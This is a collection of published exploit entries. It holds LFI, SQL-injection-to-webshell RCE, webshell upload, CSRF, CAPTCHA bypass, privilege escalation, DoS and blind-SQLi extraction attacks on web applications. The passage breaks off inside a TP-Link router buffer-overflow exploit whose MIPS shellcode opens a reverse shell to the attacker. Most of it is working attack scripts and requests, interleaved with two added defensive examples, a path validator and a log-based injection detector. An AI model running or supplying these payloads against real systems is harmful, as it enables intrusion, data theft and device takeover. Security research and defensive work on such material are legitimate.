# Exploit Title: [Local File Inclusion Processwire CMS 2.4.0]
# Vulnerability Type: Unauthenticated LFI
# Date: [03.11.2020]
# Exploit Author: [Y1LD1R1M]
# Type: [WEBAPPS]
# Platform: [PHP]
# Vendor Homepage: [https://processwire.com/]
# Version: [2.4.0]
# Tested on: [Kali Linux]


** Description **

Local File Inclusion in Processwire CMS 2.4.0 allows retrieval of arbitrary files via the download parameter of index.php. By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.

** Proof of Concept **

http://URL/index.php?download=/etc/passwd

http://URL/index.php?download=../config.php
            
# Exploit Title: School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution
# Date: 4-11-2020
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14562/school-log-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip
# Version: 1.0
# Tested on: Parrot 5.5.17 + Apache 2.4.46

# replace shell.php with your own php reverse shell
# change [TARGET URL] to target URL or IP address
# setup your netcat listener for sum good ol shellz



#!/usr/bin/python3

import requests
import time

def sqli_admin():
        s = requests.Session()
        data = {"username":"admin'or'1'=1#","password":"hacked"}
        adminlogin = "http://localhost/slms/admin/ajax.php?action=save_settings"
        s.post(adminlogin,data=data)
        return s

def trigger_rce(session):
        starttime = int(time.time())
        multipart_form_data = {
        "name": ("cyberscurity"),
        "email": ("test@test.com"),
        "contact" : ("+11111111111"),
        "about" : ("Nothing much about it"),
        "img" : ("shell.php", open("shell.php", "rb"))
        }
        session.post("http://localhost/slms/admin/ajax.php?action=save_settings", files=multipart_form_data)
        get_shell(starttime-100,starttime+100,session)


def get_shell(start,end,session):
        for i in range(start,end):
                 session.get("http://localhost/slms/admin/assets/uploads/"+str(i)+"_shell.php")
                 response = requests.get ("http://localhost/slms/admin/assets/uploads/"+ str(i) +"_shell.php")
                 if response.status_code == 200:
                            print("http://localhost/slms/admin/assets/uploads/"+str(i)+"_shell.php")
                        

def main():
        session = sqli_admin()
        trigger_rce(session)

if __name__ == '__main__':
        main()
            
# Exploit Title: PDW File Browser 1.3 - Remote Code Execution
# Date: 24-10-2020
# Exploit Author: David Bimmel
# Researchers: David Bimmel, Joost Vondeling, Ramòn Janssen
# Vendor Homepage: n/a
# Software Link: https://github.com/GuidoNeele/PDW-File-Browser
# Version: <=1.3

Attack type
Remote

Impact
Remote Code Execution

The PDW File Browser is a plugin for the TinyMCE and CKEditor WYSIWYG editors. The PDW File Browser contains a critical software vulnerability which results in remote code execution on the web server. This vulnerability can be exploited by all authenticated users.


Steps to RCE:

Upload a .txt file containing your webshell code using the default file upload functionality within the PDW File Browser. Please note that all users (including unauthenticated users) are able to access your webshell later on. For security purposes I would recommend using weevely (https://github.com/epinna/weevely3) as this obfuscates and password-protects your webshell. Below I have provided what the request should look like for uploading your WEBSHELL.txt file.


POST /ckeditor/plugins/pdw_file_browser/ajax_php_uploader.php?uploadpath=%2Fmedia%2F&qqfile=WEBSHELL.txt HTTP/1.1
Host: <HOSTNAME>
[…]
<?php
<WEBSHELLCODE HERE>
?>


Once you have uploaded your webshell with a .txt extension (WEBSHELL.txt) you are able to rename the file using the rename functionality of the PDW File Browser.
Within this functionality it is possible both to change the file extension of your WEBSHELL from .txt to .php and to move the file to an arbitrary location on the web server. The path to the arbitrary location should contain double-encoded characters.

Below I have provided an example which both renames our WEBSHELL.txt to WEBSHELL.php and relocates the file to the 'content' directory.


POST /ckeditor/plugins/pdw_file_browser/actions.php HTTP/1.1
Host: <HOSTNAME>
[…]
action=rename&new_filename=%252E%252E%252Fcontent%252FWEBSHELL.php&old_filename=WEBSHELL.txt&folder=%252Fmedia%252F&type=file


After this request your webshell should be located at ‘https://<TARGET>/content/WEBSHELL.php’


Happy Hacking :^)
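
A server-side check for the two path-handling flaws described above (the Processwire download parameter and the PDW File Browser rename request), as an added example that is not code from either project. The storage root, the extension allowlist and all function names are assumptions made for the illustration.

```python
import posixpath
from urllib.parse import unquote

# Assumed values for this example; neither project defines them.
UPLOAD_ROOT = "/srv/app/files"
ALLOWED_EXTENSIONS = {".txt", ".png", ".jpg", ".jpeg", ".gif", ".pdf"}
MAX_DECODE_ROUNDS = 5


class RejectedPath(ValueError):
    """A client-supplied path or file name that must not be used."""


def fully_decode(value):
    """Percent-decode until the value stops changing.

    A filter that decodes once sees %252E%252E%252F as %2E%2E%2F; a second
    decode further down the stack turns it into ../ after the check has run.
    """
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise RejectedPath("too many layers of percent-encoding")


def resolve_inside(root, client_path):
    """Map a client path to a location under root, or raise RejectedPath.

    The check is lexical so the example runs without a file system; a
    deployment would also compare os.path.realpath() to catch symlinks.
    """
    decoded = fully_decode(client_path).replace("\\", "/")
    if "\x00" in decoded:
        raise RejectedPath("NUL byte in path")
    # Leading slashes are stripped so an absolute path cannot replace root.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        raise RejectedPath("path escapes " + root)
    return candidate


def check_rename(folder, old_name, new_name):
    """Allow a rename only within the same folder and the same file type."""
    old_decoded = fully_decode(old_name)
    new_decoded = fully_decode(new_name).replace("\\", "/")
    if ("/" in new_decoded or "\x00" in new_decoded
            or new_decoded in ("", ".", "..")):
        raise RejectedPath("new name must be a bare file name")
    old_ext = posixpath.splitext(old_decoded)[1].lower()
    new_ext = posixpath.splitext(new_decoded)[1].lower()
    if new_ext not in ALLOWED_EXTENSIONS:
        raise RejectedPath("extension %r is not allowed" % new_ext)
    if new_ext != old_ext:
        raise RejectedPath("rename may not change the file type")
    return posixpath.join(resolve_inside(UPLOAD_ROOT, folder), new_decoded)


def verdict(check, *args):
    """Run a check and describe the outcome as a string."""
    try:
        return "ok: " + check(*args)
    except RejectedPath as exc:
        return "rejected: " + str(exc)


if __name__ == "__main__":
    # Parameter values taken from the two proofs of concept on this page.
    print(verdict(resolve_inside, UPLOAD_ROOT, "/etc/passwd"))
    print(verdict(resolve_inside, UPLOAD_ROOT, "../config.php"))
    print(verdict(check_rename, "%252Fmedia%252F", "WEBSHELL.txt",
                  "%252E%252E%252Fcontent%252FWEBSHELL.php"))
    print(verdict(check_rename, "/media/", "WEBSHELL.txt", "WEBSHELL.php"))
    # Constructed benign request.
    print(verdict(check_rename, "/media/", "notes.txt", "report.txt"))
```

The absolute path from the first proof of concept is not rejected but remapped under the storage root, so it can only ever name a file inside that directory.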
            
# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)
# Date: 2020-07-16
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.yerootech.com
# Version: 6.2

iDS6 DSSPro Digital Signage System 6.2 Cross-Site Request Forgery (CSRF)


Vendor: Guangzhou Yeroo Tech Co., Ltd.
Product web page: http://www.yerootech.com
Affected version: V6.2 B2014.12.12.1220
                  V5.6 B2017.07.12.1757
                  V4.3

Summary: iDS6 Software's DSSPro network digital signage management system
is a web-based server software solution for Windows.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: Microsoft Windows XP
           Microsoft Windows 7
           Microsoft Windows Server 2008
           Microsoft Windows Server 2012
           Microsoft Windows 10
           Apache Tomcat/8.0.44
           Apache Tomcat/6.0.35
           Apache-Coyote/1.1
           Apache Axis/1.4
           MySQL 5.5.25
           Java 1.8.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5606
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5606.php


16.07.2020

--


Add user:
---------

<html>
  <body>
    <form action="http://192.168.1.88/Pages/user!addUser" method="POST">
      <input type="hidden" name="user.userName" value="testingus" />
      <input type="hidden" name="user.password" value="zeroscience" />
      <input type="submit" value="add()" />
    </form>
  </body>
</html>
            
# Exploit Title: Student Attendance Management System 1.0 - 'username' SQL Injection / Remote Code Execution
# Date: 4-11-2020
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/student-attendance-management-system.zip
# Version: 1.0
# Tested on: Parrot 5.5.17 + Apache 2.4.46

# replace shell.php with your own php reverse shell
# change [TARGET URL] to target URL or IP address
# setup your netcat listener for sum good ol shellz



#!/usr/bin/python3

import requests
import time

def sqli_admin():
        s = requests.Session()
        data = {"username":"admin'or'1'=1#","password":"mosaaed"}
        adminlogin = "http://localhost/sta/ajax.php?action=save_settings"
        s.post(adminlogin,data=data)
        return s

def trigger_rce(session):
        starttime = int(time.time())
        multipart_form_data = {
        "name": ("cyberscurity"),
        "email": ("test@test.com"),
        "contact" : ("+11111111111"),
        "about" : ("attack"),
        "img" : ("shell.php", open("shell.php", "rb"))
        }
        session.post("http://localhost/sta/ajax.php?action=save_settings", files=multipart_form_data)
        get_shell(starttime-100,starttime+100,session)


def get_shell(start,end,session):
        for i in range(start,end):
                 session.get("http://localhost/sta/assets/uploads/"+str(i)+"_shell.php")
                 response = requests.get ("http://localhost/sta/assets/uploads/"+ str(i) +"_shell.php")
                 if response.status_code == 200:
                            print("http://localhost/sta/assets/uploads/"+str(i)+"_shell.php")
                        

def main():
        session = sqli_admin()
        trigger_rce(session)

if __name__ == '__main__':
        main()
            
# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass
# Date: 2020-07-16
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.yerootech.com
# Version: 6.2

iDS6 DSSPro Digital Signage System 6.2 CAPTCHA Security Bypass


Vendor: Guangzhou Yeroo Tech Co., Ltd.
Product web page: http://www.yerootech.com
Affected version: V6.2 B2014.12.12.1220
                  V5.6 B2017.07.12.1757
                  V4.3

Summary: iDS6 Software's DSSPro network digital signage management
system is a web-based server software solution for Windows.

Desc: The CAPTCHA function for DSSPro is prone to a security bypass
vulnerability that occurs in the CAPTCHA authentication routine. By
requesting the autoLoginVerifyCode object an attacker can receive a
JSON message code and successfully bypass the CAPTCHA-based authentication
challenge and perform brute-force attacks.

Tested on: Microsoft Windows XP
           Microsoft Windows 7
           Microsoft Windows Server 2008
           Microsoft Windows Server 2012
           Microsoft Windows 10
           Apache Tomcat/8.0.44
           Apache Tomcat/6.0.35
           Apache-Coyote/1.1
           Apache Axis/1.4
           MySQL 5.5.25
           Java 1.8.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5607
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5607.php


16.07.2020

--


Get CAPTCHA code:
-----------------

$ curl -i http://192.168.1.88/Pages/login\!autoLoginVerifyCode -c cookies.txt

{"success":true,"message":"6435","data":"6435"}


Use CAPTCHA code:
-----------------

$ curl -i http://192.168.1.88/Pages/login\!userValidate -b cookies.txt -d "shortName=&user.userName=boss&user.password=boss&loginVerifyCode=6435&autoSave=true&autoLogin=true&domain_login=" -v

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: cookie.username=boss; Expires=Wed, 21-Jul-2021 19:41:26 GMT
Set-Cookie: cookie.password=boss; Expires=Wed, 01-Jul-2021 19:41:26 GMT
Set-Cookie: cookie.autosave=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT
Set-Cookie: cookie.autologin=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/x-json;charset=UTF-8
Date: Tue, 21 Jul 2020 19:41:26 GMT
Connection: close
Content-Length: 16

{"success":true}
            
# Exploit Title: Amarok 2.8.0 - Denial-of-Service
# Date: 1 November 2020
# Exploit Author: FishballAndMeatball
# Vendor Homepage: https://amarok.kde.org/
# Software link: https://community.kde.org/Amarok/GettingStarted/Download
# Version: Amarok 2.8.0
# Tested on: Windows 10, Windows 7, Windows XP
# CVE: CVE-2020-13152

my $file= "test_big.m3u";
my $junk= "\x41" x 6368545;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "m3u File Created successfully\n";
            
# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation
# Date: 2020-07-16
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.yerootech.com
# Version: 6.2

iDS6 DSSPro Digital Signage System 6.2 Improper Access Control Privilege Escalation


Vendor: Guangzhou Yeroo Tech Co., Ltd.
Product web page: http://www.yerootech.com
Affected version: V6.2 B2014.12.12.1220
                  V5.6 B2017.07.12.1757
                  V4.3

Summary: iDS6 Software's DSSPro network digital signage management system
is a web-based server software solution for Windows.

Desc: The application suffers from a privilege escalation vulnerability.
An authenticated user can elevate his/her privileges by calling JS functions
from the console or by insecure direct object references to hidden functionalities
that can result in creating users, modifying roles and permissions and full
takeover of the application.

Tested on: Microsoft Windows XP
           Microsoft Windows 7
           Microsoft Windows Server 2008
           Microsoft Windows Server 2012
           Microsoft Windows 10
           Apache Tomcat/8.0.44
           Apache Tomcat/6.0.35
           Apache-Coyote/1.1
           Apache Axis/1.4
           MySQL 5.5.25
           Java 1.8.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5608
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5608.php


16.07.2020

--


--------------------
Default credentials:
--------------------

admin:123456 (id: n/k, access: /admin)
boss:boss (id: 100001, access: /)
user:user (id: 100002, access: /)


----------------------------
Once logged-in, create user:
----------------------------

In Console, once navigated to the Accounts->User page (http://192.168.1.88/Pages/user.action)
Type: add()

or issue a POST request:

$ curl -d "user.userName=testingus&user.password=testingus" http://192.168.1.88/Pages/user\!addUser -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"


--------------
List user IDs:
--------------

$ curl -d "az=asc" http://192.168.1.88/Pages/user\!list -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"


------------
Create role:
------------

In Console, once navigated to the Accounts->Role page (http://192.168.1.88/Pages/role.action):
Type: add()

or issue a POST request:

$ curl -d "role.roleName=ROLENAME&role.description=ROLEDESC" http://192.168.1.88/Pages/role\!add -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"


--------------
List role IDs:
--------------

$ curl -X POST http://192.168.1.88/Pages/role\!list -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"


------------------------------------------
Apply all permissions to the created role:
------------------------------------------

$ curl http://192.168.1.88/Pages/role\!updatePermissions -d "role.roleId={ROLE_ID}&privileges=2&privileges=1&privileges=3&privileges=4&privileges=7&privileges=6&privileges=5&privileges=12&privileges=8&privileges=13&privileges=9&privileges=10&privileges=11&privileges=14&privileges=16&privileges=15&privileges=17&privileges=18&privileges=21&privileges=33&privileges=32&privileges=34&privileges=35&privileges=36&privileges=37&privileges=23&privileges=22&privileges=24&privileges=41&privileges=47&privileges=46&privileges=48&privileges=49&privileges=50&privileges=51&privileges=52&privileges=53"


------------------------------------
Assign created role to created user:
------------------------------------

$ curl -d "user.userId={USER_ID}&roles={ROLE_ID}" http://192.168.1.88/Pages/user\!updateRole -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"


------------
Delete user:
------------

In Console, once navigated to the Accounts->User page (http://192.168.1.88/Pages/user.action), select desired username:
Type: del()

or issue a POST request:

$ curl -d "userid={USER_ID}" http://192.168.1.88/Pages/user\!del -H "X-Requested-With: XMLHttpRequest" -H "Cookie: JSESSIONID=9619CDB08E026F6CDC4B7AED60729D3B"
            
# Exploit Title: SmartBlog 2.0.1 - 'id_post' Blind SQL injection
# Date: 2020-11-05
# Exploit Author: C0wnuts
# Vendor Homepage: https://github.com/smartdatasoft/smartblog
# Version: 2.0.1
# Tested on: Linux

# Description : A blind SQL injection is present in the "id_post" parameter of the "details" controller. It allows you to extract information from the database by means of successive character tests.

# POC: 

# -------------------------
# http://localhost/[script_path]/index.php?fc=module&module=smartblog&id_post=<valid post number> or {SQL}&controller=details
# -------------------------
# Example:

# 1. Test if the first character of the database name is "t":
# http://localhost/index.php?fc=module&module=smartblog&id_post=1 or substring(DATABASE(),1,1)='t'&controller=details

# 2. Test if the first character of the email of the first account is "a":
# http://localhost/index.php?fc=module&module=smartblog&id_post=1 or substring((SELECT email FROM ps_employee LIMIT 1 offset 0),1,1)='a'&controller=details
# -------------------------
# Script PYTHON (python 3)


import requests, string
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry

initialUrl  = 'https://localhost.com/index.php?fc=module&module=smartblog&id_post=4329824944'
endOfUrl    = '&controller=details'
# Change this to http:// if the website is not in https
protocol    = "https://"
offset      = 0
endData     = 0
end         = 0
iteration   = 0
charList    = string.printable

# The character returned by the db when you reach the end of the extracted information. In my case that was "+" but it can be "\", or " " or whatever. /!\ Just test and change this value according to your needs /!\
endChar     = "+"
# The length of the page when the SQLI failed. In my case that was 16094. If the length of the content of the page is higher than this value, the character tested is the right one. /!\ Just test and change this value according to your needs /!\.
FailPageLen = 17000


# MySQL is not case sensitive but if the db used by the website is case sensitive remove the following line
charList   = charList.replace("ABCDEFGHIJKLMNOPQRSTUVWXYZ","")

while endData == 0:
	contentInfo = ""
	iteration   = 0
	end = 0
	while end == 0:
		iteration = iteration + 1
		for elem in charList:
			url            = initialUrl
			
			#This request gets the email of all employees. Replace the request with whatever you want, but keep in mind that the script extracts information one character at a time, so you need to keep '+str(offset)+' and substring(,'+str(iteration)+',1). "elem" is the character tested
			request        = '%20or%20substring((SELECT%20email%20FROM%20ps_employee%20LIMIT%201%20offset%20'+str(offset)+'),'+str(iteration)+',1)=%27'+elem+'%27'
			
			url += request + endOfUrl
			retry_strategy = Retry(
				total = 30, 
				backoff_factor = 0.2, 
				method_whitelist = ["GET" "POST"]
			)
			adapter  = HTTPAdapter(max_retries=retry_strategy)
			http     = requests.Session()
			http.mount(protocol, adapter)
			response = http.get("{}".format(url))

			if len(response.content) > FailPageLen:
				print(contentInfo)
				if(elem == endChar):
					end = 1
					if contentInfo == "":
						endData = 1
				else:
					contentInfo = contentInfo + elem
					break
		if contentInfo == "":
			endData = 1
	print(contentInfo)
	offset = offset + 1
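
The character-by-character tests described above leave a distinctive trail in web server logs, because id_post should only ever be a number. The following added example (not part of the original advisory or of SmartBlog) flags clients whose id_post values fail an integer check and counts their substring tests; the Apache combined log format, the alert threshold, the function names and the sample log lines are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache combined-format prefix: client, timestamp, request line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'\d{3} (?:\d+|-)'
)
# One boolean character test: substring(<expr>, <position>, 1) = '<char>'
CHAR_TEST_RE = re.compile(
    r"substring\s*\(.*,\s*(?P<pos>\d+)\s*,\s*1\s*\)\s*=\s*'(?P<char>.)'",
    re.IGNORECASE | re.DOTALL,
)
POST_ID_RE = re.compile(r"[0-9]{1,10}")

_BASE = "/index.php?fc=module&module=smartblog&id_post="
_TAIL = '&controller=details HTTP/1.1" 200 '
# Constructed sample lines; addresses are from the documentation ranges.
SAMPLE_LOG = [
    '198.51.100.20 - - [05/Nov/2020:10:00:00 +0000] "GET ' + _BASE
    + "12" + _TAIL + "16094",
    '192.0.2.55 - - [05/Nov/2020:10:00:01 +0000] "GET ' + _BASE
    + "12abc" + _TAIL + "16094",
    '203.0.113.7 - - [05/Nov/2020:10:00:02 +0000] "GET ' + _BASE
    + "1%20or%20substring(DATABASE(),1,1)=%27s%27" + _TAIL + "16094",
    '203.0.113.7 - - [05/Nov/2020:10:00:02 +0000] "GET ' + _BASE
    + "1%20or%20substring(DATABASE(),1,1)=%27t%27" + _TAIL + "17412",
    '203.0.113.7 - - [05/Nov/2020:10:00:03 +0000] "GET ' + _BASE
    + "1%20or%20substring(DATABASE(),2,1)=%27a%27" + _TAIL + "16094",
    '203.0.113.7 - - [05/Nov/2020:10:00:03 +0000] "GET ' + _BASE
    + "1%20or%20substring(DATABASE(),2,1)=%27e%27" + _TAIL + "17412",
]


def is_valid_post_id(value):
    """The check the controller should apply before building its query."""
    return POST_ID_RE.fullmatch(value) is not None


def id_post_of(line):
    """Return (client_ip, decoded id_post) or None if the line has none."""
    match = LOG_RE.match(line)
    if not match:
        return None
    query = urlsplit(match["target"]).query
    values = parse_qs(query, keep_blank_values=True).get("id_post")
    if not values:
        return None
    return match["ip"], values[0]


def summarize(lines):
    """Per client: invalid id_post values, character tests, tested positions."""
    stats = defaultdict(
        lambda: {"invalid": 0, "char_tests": 0, "positions": set()}
    )
    for line in lines:
        parsed = id_post_of(line)
        if parsed is None:
            continue
        ip, value = parsed
        if is_valid_post_id(value):
            continue
        stats[ip]["invalid"] += 1
        probe = CHAR_TEST_RE.search(value)
        if probe:
            stats[ip]["char_tests"] += 1
            stats[ip]["positions"].add(int(probe["pos"]))
    return dict(stats)


def alerts(lines, threshold=3):
    """Clients with at least `threshold` character tests (assumed cut-off)."""
    return sorted(
        ip for ip, s in summarize(lines).items()
        if s["char_tests"] >= threshold
    )


if __name__ == "__main__":
    for ip, s in sorted(summarize(SAMPLE_LOG).items()):
        print(ip, s["invalid"], s["char_tests"], sorted(s["positions"]))
    print("alert:", alerts(SAMPLE_LOG))
```

Rejecting any request for which `is_valid_post_id` is false, before the value reaches the query, closes the injection point itself; the log summary is for finding attempts that have already happened.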
            
# Exploit Title: TP-Link WDR4300 - Remote Code Execution (Authenticated)
# Date: 2020-08-28
# Exploit Author: Patrik Lantz
# Vendor Homepage: https://www.tp-link.com/se/home-networking/wifi-router/tl-wdr4300/
# Version: TL-WDR4300, N750 Wireless Dual Band Gigabit Router
# Tested on: Firmware version 3.13.33 and 3.14.3
# CVE : CVE-2017-13772

#!/usr/bin/python3

import sys
import hashlib 
import base64
import requests 
import binascii
import socket


"""
RCE via stack-based overflow on TP-Link WDR4300 (N750) devices, using CVE-2017-13772.
Tested on Firmware versions 3.13.33, Build 130618 and 3.14.3 Build 150518, hardware WDR4300 v1

Usage:
1) Start listener on attacker machine: nc -nlvvp 31337
2) Execute script: python exploit.py <attacker_ip>

"""

def main(argv):
    if len(sys.argv) < 2:
        print("Usage: python exploit.py <attacker_ip>")
        sys.exit(1)

    password = "admin"
    target = "192.168.0.1:80"
    attacker_ip = sys.argv[1]

    attacker = binascii.hexlify(socket.inet_aton(attacker_ip))
    ip = [attacker[i:i+2] for i in range(0, len(attacker), 2)]

    if '00' in ip or '20' in ip:
        print("[-] Specified attacker IP will result in bad characters being present in the shellcode. Avoid any IPs containing .0. and .32.")
        sys.exit(1) 

    url = "http://" + target + "/"
    try:
        r = requests.get(url=url)
    except:
        print("[-] Could not connect to target: " + target)
        sys.exit(1)

    if 'WWW-Authenticate' in r.headers.keys():
        if not 'WDR4300' in r.headers['WWW-Authenticate']:
            print("[-] This is not TP-Link WDR4300 (N750)")
            sys.exit(1)
    else:
        print("[-] This does not seem to be the web interface of a router!")


    credentials = "admin" + ":" + hashlib.md5(password).hexdigest()
    auth = base64.b64encode(credentials)
    url = "http://" + target + "/userRpm/LoginRpm.htm?Save=Save"

    print("[+] Setting target to: " + target)
    print("[+] Using default admin password: " + password)
    print("[+] Cookie set to: Authorization=Basic%20" + auth)

    h = {}
    h["Cookie"] = "Authorization=Basic%20" + auth
    h['Upgrade-Insecure-Requests'] = '1'
    h['Referer'] = 'http://' + target + '/'

    r = requests.get(url = url, headers=h) 
    data = r.text
    if "httpAutErrorArray" in data:
        print('[-] Could not login to the admin interface')
        sys.exit(1)

    older_fw = False
    # older firmware, e.g., 3.13.33 
    if "<TITLE>Login Incorrect</TITLE>" in data:
        print("[-] Incorrect login, perhaps an older firmware? Sending digest authentication using the Authorization header instead..")
        credentials = "admin:" + password
        auth = base64.b64encode(credentials)
        url = "http://" + target + "/"
        h = {}
        h["Authorization"] = "Basic%20" + auth
        h['Upgrade-Insecure-Requests'] = '1'
        h['Referer'] = 'http://' + target + '/'
        r = requests.get(url = url, headers=h) 
        data = r.text
        if 'window.parent.location.href' not in data:
            print("[-] Failed to login to the admin interface")
            sys.exit(1)
        print('[+] Older firmware confirmed, successfully logged in')
        older_fw = True

    authenticated_url = data.split('window.parent.location.href = ')[1].split(';')[0].replace('"','')


    unique_id = ''
    if not older_fw:
        unique_id =  authenticated_url.split('/userRpm')[0].split('/')[3] + '/'
        print("[+] Authentication succeeded, got unique id: " + unique_id.replace('/',''))
    
    # now we deliver the exploit payload via a GET request
    h['Referer'] = 'http://' + target + '/' + unique_id + 'userRpm/DiagnosticRpm.htm'
  

    # NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes)
    nopsled = ""
    for i in range(12):
        nopsled += "\x26\x40\x08\x01"

    # identified bad characters: 0x20,0x00
    # Using reverse tcp shellcode from https://www.exploit-db.com/exploits/45541
    buf = b""
    buf += "\x24\x0f\xff\xfa"      # li      $t7, -6
    buf += "\x01\xe0\x78\x27"      # nor     $t7, $zero
    buf += "\x21\xe4\xff\xfd"      # addi    $a0, $t7, -3
    buf += "\x21\xe5\xff\xfd"      # addi    $a1, $t7, -3
    buf += "\x28\x06\xff\xff"      # slti    $a2, $zero, -1
    buf += "\x24\x02\x10\x57"      # li      $v0, 4183 ( sys_socket )
    buf += "\x01\x01\x01\x0c"      # syscall 0x40404
    buf += "\xaf\xa2\xff\xff"      # sw      $v0, -1($sp)
    buf += "\x8f\xa4\xff\xff"      # lw      $a0, -1($sp)
    buf += "\x34\x0f\xff\xfd"      # li      $t7, -3 ( sa_family = AF_INET )
    buf += "\x01\xe0\x78\x27"      # nor     $t7, $zero
    buf += "\xaf\xaf\xff\xe0"      # sw      $t7, -0x20($sp)
    buf += "\x3c\x0e\x7a\x69"      # lui     $t6, 0x7a69 ( sin_port = 0x7a69 )
    buf += "\x35\xce\x7a\x69"      # ori     $t6, $t6, 0x7a69
    buf += "\xaf\xae\xff\xe4"      # sw      $t6, -0x1c($sp)
    buf += "\x3c\x0e" + ip[0].decode('hex')  + ip[1].decode('hex')       # lui     $t6, 0xAABB         ( sin_addr = 0xAABB ...
    buf += "\x35\xce" + ip[2].decode('hex')  + ip[3].decode('hex')       # ori     $t6, $t6, 0xCCDD                 ... 0xCCDD
    buf += "\xaf\xae\xff\xe6"      # sw      $t6, -0x1a($sp)
    buf += "\x27\xa5\xff\xe2"      # addiu   $a1, $sp, -0x1e
    buf += "\x24\x0c\xff\xef"      # li      $t4, -17  ( addrlen = 16 )
    buf += "\x01\x80\x30\x27"      # nor     $a2, $t4, $zero
    buf += "\x24\x02\x10\x4a"      # li      $v0, 4170 ( sys_connect )
    buf += "\x01\x01\x01\x0c"      # syscall 0x40404
    buf += "\x24\x0f\xff\xfd"      # li      t7,-3
    buf += "\x01\xe0\x28\x27"      # nor     a1,t7,zero
    buf += "\x8f\xa4\xff\xff"      # lw      $a0, -1($sp)  
    buf += "\x24\x02\x0f\xdf"      # li      $v0, 4063 ( sys_dup2 )
    buf += "\x01\x01\x01\x0c"      # syscall 0x40404
    buf += "\x24\xa5\xff\xff"      # addi    a1,a1,-1 (\x20\xa5\xff\xff)
    buf += "\x24\x01\xff\xff"      # li      at,-1
    buf += "\x14\xa1\xff\xfb"      # bne     a1,at, dup2_loop
    buf += "\x28\x06\xff\xff"      # slti    $a2, $zero, -1
    buf += "\x3c\x0f\x2f\x2f"      # lui     $t7, 0x2f2f
    buf += "\x35\xef\x62\x69"      # ori     $t7, $t7, 0x6269
    buf += "\xaf\xaf\xff\xec"      # sw      $t7, -0x14($sp)
    buf += "\x3c\x0e\x6e\x2f"      # lui     $t6, 0x6e2f
    buf += "\x35\xce\x73\x68"      # ori     $t6, $t6, 0x7368
    buf += "\xaf\xae\xff\xf0"      # sw      $t6, -0x10($sp)
    buf += "\xaf\xa0\xff\xf4"      # sw      $zero, -0xc($sp)
    buf += "\x27\xa4\xff\xec"      # addiu   $a0, $sp, -0x14
    buf += "\xaf\xa4\xff\xf8"      # sw      $a0, -8($sp)
    buf += "\xaf\xa0\xff\xfc"      # sw      $zero, -4($sp)
    buf += "\x27\xa5\xff\xf8"      # addiu   $a1, $sp, -8
    buf += "\x24\x02\x0f\xab"      # li      $v0, 4011 (sys_execve)
    buf += "\x01\x01\x01\x0c"      # syscall 0x40404

    shellcode = nopsled + buf

    """
    We control $ra, $s0 and $s1 via the buffer overflow.

    libc_base: 0x2aae2000
    First ROP (sleep_gadget): 0x0004c974 + libc_base = 0x2ab2e974
    0x0004c97c      move    t9, s0
    0x0004c980      lw      ra, (var_1ch)
    0x0004c984      lw      s0, (var_18h)
    0x0004c988      addiu   a0, zero, 2 ; arg1
    0x0004c98c      addiu   a1, zero, 1 ; arg2
    0x0004c990      move    a2, zero
    0x0004c994      jr      t9

    sleep is located at 0x00053ca0 => so $s0 = 0x2ab35ca0

    This gadget calls sleep, in this gadget we also set the return address to the second ROP gadget which is controlled by setting appropriate value on the stack location 0x1c($sp), i.e., the first value on the stack, due to the instruction at 0x0004c980.


    Second ROP (stack_gadget): 0x00039fa8 + libc_base = 0x2ab1bfa8
    0x00039fa8      addiu   s0, sp, 0x28
    0x00039fac      move    a0, s3
    0x00039fb0      move    a1, s0
    0x00039fb4      move    t9, s1
